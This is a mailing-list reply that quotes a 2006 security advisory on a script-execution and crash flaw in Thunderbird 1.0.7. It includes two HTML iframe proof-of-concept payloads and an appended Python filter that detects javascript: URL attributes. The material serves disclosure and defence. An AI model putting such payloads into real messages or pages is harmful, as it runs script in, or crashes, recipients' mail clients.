You must really have nothing to do, to go looking for bugs in an outdated version, lol :->

Renaud Lifchitz wrote:
> Mozilla Thunderbird : Remote Code Execution & Denial of Service
>
> //----- Advisory
>
>
> Program : Mozilla Thunderbird
> Homepage : http://www.mozilla.com/thunderbird/
> Tested version : <= 1.0.7
> Found by : nono2357 at sysdream dot com
> This advisory : nono2357 at sysdream dot com
> Discovery date : 2006/01/28
>
>
> //----- Application description
>
>
> Full-Featured Email
>
> Simple to use, powerful, and customizable, Thunderbird is a
> full-featured email application. Thunderbird supports IMAP and POP
> mail protocols, as well as HTML mail formatting. Easily import your
> existing email accounts and messages. Built-in RSS capabilities,
> powerful quick search, spell check as you type, global inbox,
> deleting attachments and advanced message filtering round out
> Thunderbird's modern feature set.
>
>
> //----- Description of vulnerability
>
>
> Thunderbird's WYSIWYG rendering engine insufficiently filters
> javascript scripts. It is possible to write javascript in the SRC
> attribute of the IFRAME tag. This leads to execution when the email
> is edited (for instance when replying to the email), even if
> javascript is disabled in the preferences.
>
>
> //----- Proof Of Concept
>
>
> * Javascript execution :
>
> <html>
> <body>
> <iframe src="javascript:alert('Found by www.sysdream.com !')"></iframe>
> </body>
> </html>
>
> * Denial of service (application crash) :
>
> <html>
> <body>
> <iframe src="javascript:parent.document.write('Found by www.sysdream.com !')"></iframe>
> </body>
> </html>
>
>
> //----- Solution
>
>
> Upgrade to version 1.5.
>
> Download page : http://www.mozilla.com/thunderbird/all.html
> Direct link :
> http://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/1.5/
>
>
> //----- Impact
>
>
> Successful exploitation may lead to information disclosure
> (application version, platform, user emails, user preferences, ...)
> or could crash the application.
>
>
> //----- Credits
>
>
> http://www.sysdream.com
> nono2357 at sysdream dot com
>
>
> //----- Greetings
>
>
> crashfr & the hackademy ...
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
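
Added example, not part of the original thread and not Thunderbird's own code: a mail-filter-side check for the pattern the advisory describes, a URL attribute such as IFRAME SRC whose scheme is javascript:. The attribute list, function names and sample bodies are assumptions chosen for illustration.

```python
import re
from html.parser import HTMLParser

# Attributes that carry a URL the rendering engine may load (assumed list).
URL_ATTRS = {"src", "href", "background", "action", "data"}
# URL parsers skip leading control characters/spaces and embedded tab/CR/LF,
# so the check normalises the value the same way before reading the scheme.
_LEADING = re.compile(r"^[\x00-\x20]+")
_EMBEDDED = re.compile(r"[\t\r\n]")


def url_scheme(value):
    """Return the lower-cased scheme of a URL attribute value, or '' if none."""
    cleaned = _EMBEDDED.sub("", _LEADING.sub("", value or ""))
    match = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", cleaned)
    return match.group(1).lower() if match else ""


class ScriptUrlFinder(HTMLParser):
    """Collect (tag, attribute, value) for every javascript: URL attribute."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lower-cased, values entity-decoded.
        for name, value in attrs:
            if name in URL_ATTRS and url_scheme(value) == "javascript":
                self.findings.append((tag, name, value))


def find_script_urls(html_body):
    """Return all javascript: URL attributes found in an HTML mail body."""
    finder = ScriptUrlFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings


# Constructed samples: the first mirrors the advisory's proof of concept.
ADVISORY_BODY = ("<html> <body> <iframe src=\"javascript:alert('Found by "
                 "www.sysdream.com !')\"></iframe> </body> </html>")
BENIGN_BODY = ('<html><body><a href="http://www.mozilla.com/thunderbird/">'
               "Thunderbird</a></body></html>")

if __name__ == "__main__":
    for body in (ADVISORY_BODY, BENIGN_BODY):
        print(find_script_urls(body))
```

A non-empty result is a reason to quarantine the message or strip the attribute before the body reaches a client's HTML editor, the path on which the advisory says the script runs.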
